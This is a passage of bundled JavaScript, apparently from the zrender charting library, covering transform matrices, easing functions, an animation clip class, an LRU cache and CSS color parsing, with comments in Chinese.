needLocalTransform = this.needLocalTransform();\n\n    var m = this.transform;\n    if (!(needLocalTransform || parentHasTransform)) {\n        m && mIdentity(m);\n        return;\n    }\n\n    m = m || create$1();\n\n    if (needLocalTransform) {\n        this.getLocalTransform(m);\n    }\n    else {\n        mIdentity(m);\n    }\n\n    // 应用父节点变换\n    if (parentHasTransform) {\n        if (needLocalTransform) {\n            mul$1(m, parent.transform, m);\n        }\n        else {\n            copy$1(m, parent.transform);\n        }\n    }\n    // 保存这个变换矩阵\n    this.transform = m;\n\n    var globalScaleRatio = this.globalScaleRatio;\n    if (globalScaleRatio != null && globalScaleRatio !== 1) {\n        this.getGlobalScale(scaleTmp);\n        var relX = scaleTmp[0] < 0 ? -1 : 1;\n        var relY = scaleTmp[1] < 0 ? -1 : 1;\n        var sx = ((scaleTmp[0] - relX) * globalScaleRatio + relX) / scaleTmp[0] || 0;\n        var sy = ((scaleTmp[1] - relY) * globalScaleRatio + relY) / scaleTmp[1] || 0;\n\n        m[0] *= sx;\n        m[1] *= sx;\n        m[2] *= sy;\n        m[3] *= sy;\n    }\n\n    this.invTransform = this.invTransform || create$1();\n    invert(this.invTransform, m);\n};\n\ntransformableProto.getLocalTransform = function (m) {\n    return Transformable.getLocalTransform(this, m);\n};\n\n/**\n * 将自己的transform应用到context上\n * @param {CanvasRenderingContext2D} ctx\n */\ntransformableProto.setTransform = function (ctx) {\n    var m = this.transform;\n    var dpr = ctx.dpr || 1;\n    if (m) {\n        ctx.setTransform(dpr * m[0], dpr * m[1], dpr * m[2], dpr * m[3], dpr * m[4], dpr * m[5]);\n    }\n    else {\n        ctx.setTransform(dpr, 0, 0, dpr, 0, 0);\n    }\n};\n\ntransformableProto.restoreTransform = function (ctx) {\n    var dpr = ctx.dpr || 1;\n    ctx.setTransform(dpr, 0, 0, dpr, 0, 0);\n};\n\nvar tmpTransform = [];\nvar originTransform = create$1();\n\ntransformableProto.setLocalTransform = function (m) {\n    if (!m) {\n        // TODO return or set identity?\n        return;\n    }\n    var sx = m[0] * m[0] + m[1] * m[1];\n    var sy = m[2] * m[2] + m[3] * m[3];\n    var position = this.position;\n    var scale$$1 = this.scale;\n    if (isNotAroundZero(sx - 1)) {\n        sx = Math.sqrt(sx);\n    }\n    if (isNotAroundZero(sy - 1)) {\n        sy = Math.sqrt(sy);\n    }\n    if (m[0] < 0) {\n        sx = -sx;\n    }\n    if (m[3] < 0) {\n        sy = -sy;\n    }\n\n    position[0] = m[4];\n    position[1] = m[5];\n    scale$$1[0] = sx;\n    scale$$1[1] = sy;\n    this.rotation = Math.atan2(-m[1] / sy, m[0] / sx);\n};\n/**\n * 分解`transform`矩阵到`position`, `rotation`, `scale`\n */\ntransformableProto.decomposeTransform = function () {\n    if (!this.transform) {\n        return;\n    }\n    var parent = this.parent;\n    var m = this.transform;\n    if (parent && parent.transform) {\n        // Get local transform and decompose them to position, scale, rotation\n        mul$1(tmpTransform, parent.invTransform, m);\n        m = tmpTransform;\n    }\n    var origin = this.origin;\n    if (origin && (origin[0] || origin[1])) {\n        originTransform[4] = origin[0];\n        originTransform[5] = origin[1];\n        mul$1(tmpTransform, m, originTransform);\n        tmpTransform[4] -= origin[0];\n        tmpTransform[5] -= origin[1];\n        m = tmpTransform;\n    }\n\n    this.setLocalTransform(m);\n};\n\n/**\n * Get global scale\n * @return {Array.<number>}\n */\ntransformableProto.getGlobalScale = function (out) {\n    var m = this.transform;\n    out = out || [];\n    if (!m) {\n        out[0] = 1;\n        out[1] = 1;\n        return out;\n    }\n    out[0] = Math.sqrt(m[0] * m[0] + m[1] * m[1]);\n    out[1] = Math.sqrt(m[2] * m[2] + m[3] * m[3]);\n    if (m[0] < 0) {\n        out[0] = -out[0];\n    }\n    if (m[3] < 0) {\n        out[1] = -out[1];\n    }\n    return out;\n};\n/**\n * 变换坐标位置到 shape 的局部坐标空间\n * @method\n * @param {number} x\n * @param {number} y\n * @return {Array.<number>}\n */\ntransformableProto.transformCoordToLocal = function (x, y) {\n    var v2 = [x, y];\n    var invTransform = this.invTransform;\n    if (invTransform) {\n        applyTransform(v2, v2, invTransform);\n    }\n    return v2;\n};\n\n/**\n * 变换局部坐标位置到全局坐标空间\n * @method\n * @param {number} x\n * @param {number} y\n * @return {Array.<number>}\n */\ntransformableProto.transformCoordToGlobal = function (x, y) {\n    var v2 = [x, y];\n    var transform = this.transform;\n    if (transform) {\n        applyTransform(v2, v2, transform);\n    }\n    return v2;\n};\n\n/**\n * @static\n * @param {Object} target\n * @param {Array.<number>} target.origin\n * @param {number} target.rotation\n * @param {Array.<number>} target.position\n * @param {Array.<number>} [m]\n */\nTransformable.getLocalTransform = function (target, m) {\n    m = m || [];\n    mIdentity(m);\n\n    var origin = target.origin;\n    var scale$$1 = target.scale || [1, 1];\n    var rotation = target.rotation || 0;\n    var position = target.position || [0, 0];\n\n    if (origin) {\n        // Translate to origin\n        m[4] -= origin[0];\n        m[5] -= origin[1];\n    }\n    scale$1(m, m, scale$$1);\n    if (rotation) {\n        rotate(m, m, rotation);\n    }\n    if (origin) {\n        // Translate back from origin\n        m[4] += origin[0];\n        m[5] += origin[1];\n    }\n\n    m[4] += position[0];\n    m[5] += position[1];\n\n    return m;\n};\n\n/**\n * 缓动代码来自 https://github.com/sole/tween.js/blob/master/src/Tween.js\n * @see http://sole.github.io/tween.js/examples/03_graphs.html\n * @exports zrender/animation/easing\n */\nvar easing = {\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    linear: function (k) {\n        return k;\n    },\n\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    quadraticIn: function (k) {\n        return k * k;\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    quadraticOut: function (k) {\n        return k * (2 - k);\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    quadraticInOut: function (k) {\n        if ((k *= 2) < 1) {\n            return 0.5 * k * k;\n        }\n        return -0.5 * (--k * (k - 2) - 1);\n    },\n\n    // 三次方的缓动（t^3）\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    cubicIn: function (k) {\n        return k * k * k;\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    cubicOut: function (k) {\n        return --k * k * k + 1;\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    cubicInOut: function (k) {\n        if ((k *= 2) < 1) {\n            return 0.5 * k * k * k;\n        }\n        return 0.5 * ((k -= 2) * k * k + 2);\n    },\n\n    // 四次方的缓动（t^4）\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    quarticIn: function (k) {\n        return k * k * k * k;\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    quarticOut: function (k) {\n        return 1 - (--k * k * k * k);\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    quarticInOut: function (k) {\n        if ((k *= 2) < 1) {\n            return 0.5 * k * k * k * k;\n        }\n        return -0.5 * ((k -= 2) * k * k * k - 2);\n    },\n\n    // 五次方的缓动（t^5）\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    quinticIn: function (k) {\n        return k * k * k * k * k;\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    quinticOut: function (k) {\n        return --k * k * k * k * k + 1;\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    quinticInOut: function (k) {\n        if ((k *= 2) < 1) {\n            return 0.5 * k * k * k * k * k;\n        }\n        return 0.5 * ((k -= 2) * k * k * k * k + 2);\n    },\n\n    // 正弦曲线的缓动（sin(t)）\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    sinusoidalIn: function (k) {\n        return 1 - Math.cos(k * Math.PI / 2);\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    sinusoidalOut: function (k) {\n        return Math.sin(k * Math.PI / 2);\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    sinusoidalInOut: function (k) {\n        return 0.5 * (1 - Math.cos(Math.PI * k));\n    },\n\n    // 指数曲线的缓动（2^t）\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    exponentialIn: function (k) {\n        return k === 0 ? 0 : Math.pow(1024, k - 1);\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    exponentialOut: function (k) {\n        return k === 1 ? 1 : 1 - Math.pow(2, -10 * k);\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    exponentialInOut: function (k) {\n        if (k === 0) {\n            return 0;\n        }\n        if (k === 1) {\n            return 1;\n        }\n        if ((k *= 2) < 1) {\n            return 0.5 * Math.pow(1024, k - 1);\n        }\n        return 0.5 * (-Math.pow(2, -10 * (k - 1)) + 2);\n    },\n\n    // 圆形曲线的缓动（sqrt(1-t^2)）\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    circularIn: function (k) {\n        return 1 - Math.sqrt(1 - k * k);\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    circularOut: function (k) {\n        return Math.sqrt(1 - (--k * k));\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    circularInOut: function (k) {\n        if ((k *= 2) < 1) {\n            return -0.5 * (Math.sqrt(1 - k * k) - 1);\n        }\n        return 0.5 * (Math.sqrt(1 - (k -= 2) * k) + 1);\n    },\n\n    // 创建类似于弹簧在停止前来回振荡的动画\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    elasticIn: function (k) {\n        var s;\n        var a = 0.1;\n        var p = 0.4;\n        if (k === 0) {\n            return 0;\n        }\n        if (k === 1) {\n            return 1;\n        }\n        if (!a || a < 1) {\n            a = 1;\n            s = p / 4;\n        }\n        else {\n            s = p * Math.asin(1 / a) / (2 * Math.PI);\n        }\n        return -(a * Math.pow(2, 10 * (k -= 1))\n                    * Math.sin((k - s) * (2 * Math.PI) / p));\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    elasticOut: function (k) {\n        var s;\n        var a = 0.1;\n        var p = 0.4;\n        if (k === 0) {\n            return 0;\n        }\n        if (k === 1) {\n            return 1;\n        }\n        if (!a || a < 1) {\n            a = 1;\n            s = p / 4;\n        }\n        else {\n            s = p * Math.asin(1 / a) / (2 * Math.PI);\n        }\n        return (a * Math.pow(2, -10 * k)\n                    * Math.sin((k - s) * (2 * Math.PI) / p) + 1);\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    elasticInOut: function (k) {\n        var s;\n        var a = 0.1;\n        var p = 0.4;\n        if (k === 0) {\n            return 0;\n        }\n        if (k === 1) {\n            return 1;\n        }\n        if (!a || a < 1) {\n            a = 1;\n            s = p / 4;\n        }\n        else {\n            s = p * Math.asin(1 / a) / (2 * Math.PI);\n        }\n        if ((k *= 2) < 1) {\n            return -0.5 * (a * Math.pow(2, 10 * (k -= 1))\n                * Math.sin((k - s) * (2 * Math.PI) / p));\n        }\n        return a * Math.pow(2, -10 * (k -= 1))\n                * Math.sin((k - s) * (2 * Math.PI) / p) * 0.5 + 1;\n\n    },\n\n    // 在某一动画开始沿指示的路径进行动画处理前稍稍收回该动画的移动\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    backIn: function (k) {\n        var s = 1.70158;\n        return k * k * ((s + 1) * k - s);\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    backOut: function (k) {\n        var s = 1.70158;\n        return --k * k * ((s + 1) * k + s) + 1;\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    backInOut: function (k) {\n        var s = 1.70158 * 1.525;\n        if ((k *= 2) < 1) {\n            return 0.5 * (k * k * ((s + 1) * k - s));\n        }\n        return 0.5 * ((k -= 2) * k * ((s + 1) * k + s) + 2);\n    },\n\n    // 创建弹跳效果\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    bounceIn: function (k) {\n        return 1 - easing.bounceOut(1 - k);\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    bounceOut: function (k) {\n        if (k < (1 / 2.75)) {\n            return 7.5625 * k * k;\n        }\n        else if (k < (2 / 2.75)) {\n            return 7.5625 * (k -= (1.5 / 2.75)) * k + 0.75;\n        }\n        else if (k < (2.5 / 2.75)) {\n            return 7.5625 * (k -= (2.25 / 2.75)) * k + 0.9375;\n        }\n        else {\n            return 7.5625 * (k -= (2.625 / 2.75)) * k + 0.984375;\n        }\n    },\n    /**\n    * @param {number} k\n    * @return {number}\n    */\n    bounceInOut: function (k) {\n        if (k < 0.5) {\n            return easing.bounceIn(k * 2) * 0.5;\n        }\n        return easing.bounceOut(k * 2 - 1) * 0.5 + 0.5;\n    }\n};\n\n/**\n * 动画主控制器\n * @config target 动画对象，可以是数组，如果是数组的话会批量分发onframe等事件\n * @config life(1000) 动画时长\n * @config delay(0) 动画延迟时间\n * @config loop(true)\n * @config gap(0) 循环的间隔时间\n * @config onframe\n * @config easing(optional)\n * @config ondestroy(optional)\n * @config onrestart(optional)\n *\n * TODO pause\n */\n\nfunction Clip(options) {\n\n    this._target = options.target;\n\n    // 生命周期\n    this._life = options.life || 1000;\n    // 延时\n    this._delay = options.delay || 0;\n    // 开始时间\n    // this._startTime = new Date().getTime() + this._delay;// 单位毫秒\n    this._initialized = false;\n\n    // 是否循环\n    this.loop = options.loop == null ? false : options.loop;\n\n    this.gap = options.gap || 0;\n\n    this.easing = options.easing || 'Linear';\n\n    this.onframe = options.onframe;\n    this.ondestroy = options.ondestroy;\n    this.onrestart = options.onrestart;\n\n    this._pausedTime = 0;\n    this._paused = false;\n}\n\nClip.prototype = {\n\n    constructor: Clip,\n\n    step: function (globalTime, deltaTime) {\n        // Set startTime on first step, or _startTime may has milleseconds different between clips\n        // PENDING\n        if (!this._initialized) {\n            this._startTime = globalTime + this._delay;\n            this._initialized = true;\n        }\n\n        if (this._paused) {\n            this._pausedTime += deltaTime;\n            return;\n        }\n\n        var percent = (globalTime - this._startTime - this._pausedTime) / this._life;\n\n        // 还没开始\n        if (percent < 0) {\n            return;\n        }\n\n        percent = Math.min(percent, 1);\n\n        var easing$$1 = this.easing;\n        var easingFunc = typeof easing$$1 === 'string' ? easing[easing$$1] : easing$$1;\n        var schedule = typeof easingFunc === 'function'\n            ? easingFunc(percent)\n            : percent;\n\n        this.fire('frame', schedule);\n\n        // 结束\n        if (percent === 1) {\n            if (this.loop) {\n                this.restart(globalTime);\n                // 重新开始周期\n                // 抛出而不是直接调用事件直到 stage.update 后再统一调用这些事件\n                return 'restart';\n            }\n\n            // 动画完成将这个控制器标识为待删除\n            // 在Animation.update中进行批量删除\n            this._needsRemove = true;\n            return 'destroy';\n        }\n\n        return null;\n    },\n\n    restart: function (globalTime) {\n        var remainder = (globalTime - this._startTime - this._pausedTime) % this._life;\n        this._startTime = globalTime - remainder + this.gap;\n        this._pausedTime = 0;\n\n        this._needsRemove = false;\n    },\n\n    fire: function (eventType, arg) {\n        eventType = 'on' + eventType;\n        if (this[eventType]) {\n            this[eventType](this._target, arg);\n        }\n    },\n\n    pause: function () {\n        this._paused = true;\n    },\n\n    resume: function () {\n        this._paused = false;\n    }\n};\n\n// Simple LRU cache use doubly linked list\n// @module zrender/core/LRU\n\n/**\n * Simple double linked list. Compared with array, it has O(1) remove operation.\n * @constructor\n */\nvar LinkedList = function () {\n\n    /**\n     * @type {module:zrender/core/LRU~Entry}\n     */\n    this.head = null;\n\n    /**\n     * @type {module:zrender/core/LRU~Entry}\n     */\n    this.tail = null;\n\n    this._len = 0;\n};\n\nvar linkedListProto = LinkedList.prototype;\n/**\n * Insert a new value at the tail\n * @param  {} val\n * @return {module:zrender/core/LRU~Entry}\n */\nlinkedListProto.insert = function (val) {\n    var entry = new Entry(val);\n    this.insertEntry(entry);\n    return entry;\n};\n\n/**\n * Insert an entry at the tail\n * @param  {module:zrender/core/LRU~Entry} entry\n */\nlinkedListProto.insertEntry = function (entry) {\n    if (!this.head) {\n        this.head = this.tail = entry;\n    }\n    else {\n        this.tail.next = entry;\n        entry.prev = this.tail;\n        entry.next = null;\n        this.tail = entry;\n    }\n    this._len++;\n};\n\n/**\n * Remove entry.\n * @param  {module:zrender/core/LRU~Entry} entry\n */\nlinkedListProto.remove = function (entry) {\n    var prev = entry.prev;\n    var next = entry.next;\n    if (prev) {\n        prev.next = next;\n    }\n    else {\n        // Is head\n        this.head = next;\n    }\n    if (next) {\n        next.prev = prev;\n    }\n    else {\n        // Is tail\n        this.tail = prev;\n    }\n    entry.next = entry.prev = null;\n    this._len--;\n};\n\n/**\n * @return {number}\n */\nlinkedListProto.len = function () {\n    return this._len;\n};\n\n/**\n * Clear list\n */\nlinkedListProto.clear = function () {\n    this.head = this.tail = null;\n    this._len = 0;\n};\n\n/**\n * @constructor\n * @param {} val\n */\nvar Entry = function (val) {\n    /**\n     * @type {}\n     */\n    this.value = val;\n\n    /**\n     * @type {module:zrender/core/LRU~Entry}\n     */\n    this.next;\n\n    /**\n     * @type {module:zrender/core/LRU~Entry}\n     */\n    this.prev;\n};\n\n/**\n * LRU Cache\n * @constructor\n * @alias module:zrender/core/LRU\n */\nvar LRU = function (maxSize) {\n\n    this._list = new LinkedList();\n\n    this._map = {};\n\n    this._maxSize = maxSize || 10;\n\n    this._lastRemovedEntry = null;\n};\n\nvar LRUProto = LRU.prototype;\n\n/**\n * @param  {string} key\n * @param  {} value\n * @return {} Removed value\n */\nLRUProto.put = function (key, value) {\n    var list = this._list;\n    var map = this._map;\n    var removed = null;\n    if (map[key] == null) {\n        var len = list.len();\n        // Reuse last removed entry\n        var entry = this._lastRemovedEntry;\n\n        if (len >= this._maxSize && len > 0) {\n            // Remove the least recently used\n            var leastUsedEntry = list.head;\n            list.remove(leastUsedEntry);\n            delete map[leastUsedEntry.key];\n\n            removed = leastUsedEntry.value;\n            this._lastRemovedEntry = leastUsedEntry;\n        }\n\n        if (entry) {\n            entry.value = value;\n        }\n        else {\n            entry = new Entry(value);\n        }\n        entry.key = key;\n        list.insertEntry(entry);\n        map[key] = entry;\n    }\n\n    return removed;\n};\n\n/**\n * @param  {string} key\n * @return {}\n */\nLRUProto.get = function (key) {\n    var entry = this._map[key];\n    var list = this._list;\n    if (entry != null) {\n        // Put the latest used entry in the tail\n        if (entry !== list.tail) {\n            list.remove(entry);\n            list.insertEntry(entry);\n        }\n\n        return entry.value;\n    }\n};\n\n/**\n * Clear the cache\n */\nLRUProto.clear = function () {\n    this._list.clear();\n    this._map = {};\n};\n\nvar kCSSColorTable = {\n    'transparent': [0, 0, 0, 0], 'aliceblue': [240, 248, 255, 1],\n    'antiquewhite': [250, 235, 215, 1], 'aqua': [0, 255, 255, 1],\n    'aquamarine': [127, 255, 212, 1], 'azure': [240, 255, 255, 1],\n    'beige': [245, 245, 220, 1], 'bisque': [255, 228, 196, 1],\n    'black': [0, 0, 0, 1], 'blanchedalmond': [255, 235, 205, 1],\n    'blue': [0, 0, 255, 1], 'blueviolet': [138, 43, 226, 1],\n    'brown': [165, 42, 42, 1], 'burlywood': [222, 184, 135, 1],\n    'cadetblue': [95, 158, 160, 1], 'chartreuse': [127, 255, 0, 1],\n    'chocolate': [210, 105, 30, 1], 'coral': [255, 127, 80, 1],\n    'cornflowerblue': [100, 149, 237, 1], 'cornsilk': [255, 248, 220, 1],\n    'crimson': [220, 20, 60, 1], 'cyan': [0, 255, 255, 1],\n    'darkblue': [0, 0, 139, 1], 'darkcyan': [0, 139, 139, 1],\n    'darkgoldenrod': [184, 134, 11, 1], 'darkgray': [169, 169, 169, 1],\n    'darkgreen': [0, 100, 0, 1], 'darkgrey': [169, 169, 169, 1],\n    'darkkhaki': [189, 183, 107, 1], 'darkmagenta': [139, 0, 139, 1],\n    'darkolivegreen': [85, 107, 47, 1], 'darkorange': [255, 140, 0, 1],\n    'darkorchid': [153, 50, 204, 1], 'darkred': [139, 0, 0, 1],\n    'darksalmon': [233, 150, 122, 1], 'darkseagreen': [143, 188, 143, 1],\n    'darkslateblue': [72, 61, 139, 1], 'darkslategray': [47, 79, 79, 1],\n    'darkslategrey': [47, 79, 79, 1], 'darkturquoise': [0, 206, 209, 1],\n    'darkviolet': [148, 0, 211, 1], 'deeppink': [255, 20, 147, 1],\n    'deepskyblue': [0, 191, 255, 1], 'dimgray': [105, 105, 105, 1],\n    'dimgrey': [105, 105, 105, 1], 'dodgerblue': [30, 144, 255, 1],\n    'firebrick': [178, 34, 34, 1], 'floralwhite': [255, 250, 240, 1],\n    'forestgreen': [34, 139, 34, 1], 'fuchsia': [255, 0, 255, 1],\n    'gainsboro': [220, 220, 220, 1], 'ghostwhite': [248, 248, 255, 1],\n    'gold': [255, 215, 0, 1], 'goldenrod': [218, 165, 32, 1],\n    'gray': [128, 128, 128, 1], 'green': [0, 128, 0, 1],\n    'greenyellow': [173, 255, 47, 1], 'grey': [128, 128, 128, 1],\n    'honeydew': [240, 255, 240, 1], 'hotpink': [255, 105, 180, 1],\n    'indianred': [205, 92, 92, 1], 'indigo': [75, 0, 130, 1],\n    'ivory': [255, 255, 240, 1], 'khaki': [240, 230, 140, 1],\n    'lavender': [230, 230, 250, 1], 'lavenderblush': [255, 240, 245, 1],\n    'lawngreen': [124, 252, 0, 1], 'lemonchiffon': [255, 250, 205, 1],\n    'lightblue': [173, 216, 230, 1], 'lightcoral': [240, 128, 128, 1],\n    'lightcyan': [224, 255, 255, 1], 'lightgoldenrodyellow': [250, 250, 210, 1],\n    'lightgray': [211, 211, 211, 1], 'lightgreen': [144, 238, 144, 1],\n    'lightgrey': [211, 211, 211, 1], 'lightpink': [255, 182, 193, 1],\n    'lightsalmon': [255, 160, 122, 1], 'lightseagreen': [32, 178, 170, 1],\n    'lightskyblue': [135, 206, 250, 1], 'lightslategray': [119, 136, 153, 1],\n    'lightslategrey': [119, 136, 153, 1], 'lightsteelblue': [176, 196, 222, 1],\n    'lightyellow': [255, 255, 224, 1], 'lime': [0, 255, 0, 1],\n    'limegreen': [50, 205, 50, 1], 'linen': [250, 240, 230, 1],\n    'magenta': [255, 0, 255, 1], 'maroon': [128, 0, 0, 1],\n    'mediumaquamarine': [102, 205, 170, 1], 'mediumblue': [0, 0, 205, 1],\n    'mediumorchid': [186, 85, 211, 1], 'mediumpurple': [147, 112, 219, 1],\n    'mediumseagreen': [60, 179, 113, 1], 'mediumslateblue': [123, 104, 238, 1],\n    'mediumspringgreen': [0, 250, 154, 1], 'mediumturquoise': [72, 209, 204, 1],\n    'mediumvioletred': [199, 21, 133, 1], 'midnightblue': [25, 25, 112, 1],\n    'mintcream': [245, 255, 250, 1], 'mistyrose': [255, 228, 225, 1],\n    'moccasin': [255, 228, 181, 1], 'navajowhite': [255, 222, 173, 1],\n    'navy': [0, 0, 128, 1], 'oldlace': [253, 245, 230, 1],\n    'olive': [128, 128, 0, 1], 'olivedrab': [107, 142, 35, 1],\n    'orange': [255, 165, 0, 1], 'orangered': [255, 69, 0, 1],\n    'orchid': [218, 112, 214, 1], 'palegoldenrod': [238, 232, 170, 1],\n    'palegreen': [152, 251, 152, 1], 'paleturquoise': [175, 238, 238, 1],\n    'palevioletred': [219, 112, 147, 1], 'papayawhip': [255, 239, 213, 1],\n    'peachpuff': [255, 218, 185, 1], 'peru': [205, 133, 63, 1],\n    'pink': [255, 192, 203, 1], 'plum': [221, 160, 221, 1],\n    'powderblue': [176, 224, 230, 1], 'purple': [128, 0, 128, 1],\n    'red': [255, 0, 0, 1], 'rosybrown': [188, 143, 143, 1],\n    'royalblue': [65, 105, 225, 1], 'saddlebrown': [139, 69, 19, 1],\n    'salmon': [250, 128, 114, 1], 'sandybrown': [244, 164, 96, 1],\n    'seagreen': [46, 139, 87, 1], 'seashell': [255, 245, 238, 1],\n    'sienna': [160, 82, 45, 1], 'silver': [192, 192, 192, 1],\n    'skyblue': [135, 206, 235, 1], 'slateblue': [106, 90, 205, 1],\n    'slategray': [112, 128, 144, 1], 'slategrey': [112, 128, 144, 1],\n    'snow': [255, 250, 250, 1], 'springgreen': [0, 255, 127, 1],\n    'steelblue': [70, 130, 180, 1], 'tan': [210, 180, 140, 1],\n    'teal': [0, 128, 128, 1], 'thistle': [216, 191, 216, 1],\n    'tomato': [255, 99, 71, 1], 'turquoise': [64, 224, 208, 1],\n    'violet': [238, 130, 238, 1], 'wheat': [245, 222, 179, 1],\n    'white': [255, 255, 255, 1], 'whitesmoke': [245, 245, 245, 1],\n    'yellow': [255, 255, 0, 1], 'yellowgreen': [154, 205, 50, 1]\n};\n\nfunction clampCssByte(i) {  // Clamp to integer 0 .. 255.\n    i = Math.round(i);  // Seems to be what Chrome does (vs truncation).\n    return i < 0 ? 0 : i > 255 ? 255 : i;\n}\n\nfunction clampCssAngle(i) {  // Clamp to integer 0 .. 360.\n    i = Math.round(i);  // Seems to be what Chrome does (vs truncation).\n    return i < 0 ? 0 : i > 360 ? 360 : i;\n}\n\nfunction clampCssFloat(f) {  // Clamp to float 0.0 .. 1.0.\n    return f < 0 ? 0 : f > 1 ? 1 : f;\n}\n\nfunction parseCssInt(str) {  // int or percentage.\n    if (str.length && str.charAt(str.length - 1) === '%') {\n        return clampCssByte(parseFloat(str) / 100 * 255);\n    }\n    return clampCssByte(parseInt(str, 10));\n}\n\nfunction parseCssFloat(str) {  // float or percentage.\n    if (str.length && str.charAt(str.length - 1) === '%') {\n        return clampCssFloat(parseFloat(str) / 100);\n    }\n    return clampCssFloat(parseFloat(str));\n}\n\nfunction cssHueToRgb(m1, m2, h) {\n    if (h < 0) {\n        h += 1;\n    }\n    else if (h > 1) {\n        h -= 1;\n    }\n\n    if (h * 6 < 1) {\n        return m1 + (m2 - m1) * h * 6;\n    }\n    if (h * 2 < 1) {\n        return m2;\n    }\n    if (h * 3 < 2) {\n        return m1 + (m2 - m1) * (2 / 3 - h) * 6;\n    }\n    return m1;\n}\n\nfunction lerpNumber(a, b, p) {\n    return a + (b - a) * p;\n}\n\nfunction setRgba(out, r, g, b, a) {\n    out[0] = r;\n    out[1] = g;\n    out[2] = b;\n    out[3] = a;\n    return out;\n}\nfunction copyRgba(out, a) {\n    out[0] = a[0];\n    out[1] = a[1];\n    out[2] = a[2];\n    out[3] = a[3];\n    return out;\n}\n\nvar colorCache = new LRU(20);\nvar lastRemovedArr = null;\n\nfunction putToCache(colorStr, rgbaArr) {\n    // Reuse removed array\n    if (lastRemovedArr) {\n        copyRgba(lastRemovedArr, rgbaArr);\n    }\n    lastRemovedArr = colorCache.put(colorStr, lastRemovedArr || (rgbaArr.slice()));\n}\n\n/**\n * @param {string} colorStr\n * @param {Array.<number>} out\n * @return {Array.<number>}\n * @memberOf module:zrender/util/color\n */\nfunction parse(colorStr, rgbaArr) {\n    if (!colorStr) {\n        return;\n    }\n    rgbaArr = rgbaArr || [];\n\n    var cached = colorCache.get(colorStr);\n    if (cached) {\n        return copyRgba(rgbaArr, cached);\n    }\n\n    // colorStr may be not string\n    colorStr = colorStr + '';\n    // Remove all whitespace, not compliant, but should just be more accepting.\n    var str = colorStr.replace(/ /g, '').toLowerCase();\n\n    // Color keywords (and transparent) lookup.\n    if (str in kCSSColorTable) {\n        copyRgba(rgbaArr, kCSSColorTable[str]);\n        putToCache(colorStr, rgbaArr);\n        return rgbaArr;\n    }\n\n    // #abc and #abc123 syntax.\n    if (str.charAt(0) === '#') {\n        if (str.length === 4) {\n            var iv = parseInt(str.substr(1), 16);  // TODO(deanm): Stricter parsing.\n            if (!(iv >= 0 && iv <= 0xfff)) {\n                setRgba(rgbaArr, 0, 0, 0, 1);\n                return;  // Covers NaN.\n            }\n            setRgba(rgbaArr,\n                ((iv & 0xf00) >> 4) | ((iv & 0xf00) >> 8),\n                (iv & 0xf0) | ((iv & 0xf0) >> 4),\n                (iv & 0xf) | ((iv & 0xf) << 4),\n                1\n            );\n            putToCache(colorStr, rgbaArr);\n            return rgbaArr;\n        }\n        else if (str.length === 7) {\n            var iv = parseInt(str.substr(1), 16);  // TODO(deanm): Stricter parsing.\n            if (!(iv >= 0 && iv <= 0xffffff)) {\n                setRgba(rgbaArr, 0, 0, 0, 1);\n                return;  // Covers NaN.\n            }\n            setRgba(rgbaArr,\n                (iv & 0xff0000) >> 16,\n                (iv & 0xff00) >> 8,\n                iv & 0xff,\n                1\n            );\n            putToCache(colorStr, rgbaArr);\n            return rgbaArr;\n        }\n\n        return;\n    }\n    var op = str.indexOf('(');\n    var ep = str.indexOf(')');\n    if (op !== -1 && ep + 1 === str.length) {\n        var fname = str.substr(0, op);\n        var params = str.substr(op + 1, ep - (op + 1)).split(',');\n        var alpha = 1;  // To allow case fallthrough.\n        switch (fname) {\n            case 'rgba':\n                if (params.length !== 4) {\n                    setRgba(rgbaArr, 0, 0, 0, 1);\n                    return;\n                }\n                alpha = parseCssFloat(params.pop()); // jshint ignore:line\n            // Fall through.\n            case 'rgb':\n                if (params.length !== 3) {\n                    setRgba(rgbaArr, 0, 0, 0, 1);\n                    return;\n                }\n                setRgba(rgbaArr,\n                    parseCssInt(params[0]),\n                    parseCssInt(params[1]),\n                    parseCssInt(params[2]),\n                    alpha\n                );\n                putToCache(colorStr, rgbaArr);\n                return rgbaArr;\n            case 'hsla':\n                if (params.length !== 4) {\n                    setRgba(rgbaArr, 0, 0, 0, 1);\n                    return;\n                }\n                params[3] = parseCssFloat(params[3]);\n                hsla2rgba(params, rgbaArr);\n                putToCache(colorStr, rgbaArr);\n                return rgbaArr;\n            case 'hsl':\n                if (params.length !== 3) {\n                    setRgba(rgbaArr, 0, 0, 0, 1);\n                    return;\n                }\n                hsla2rgba(params, rgbaArr);\n                putToCache(colorStr, rgbaArr);\n                return rgbaArr;\n            default:\n                return;\n        }\n    }\n\n    setRgba(rgbaArr, 0, 0, 0, 1);\n    return;\n}\n\n/**\n * @param {Array.<number>} hsla\n * @param {Array.<number>} rgba\n * @return {Array.<number>} rgba\n */\nfunction hsla2rgba(hsla, rgba) {\n    var 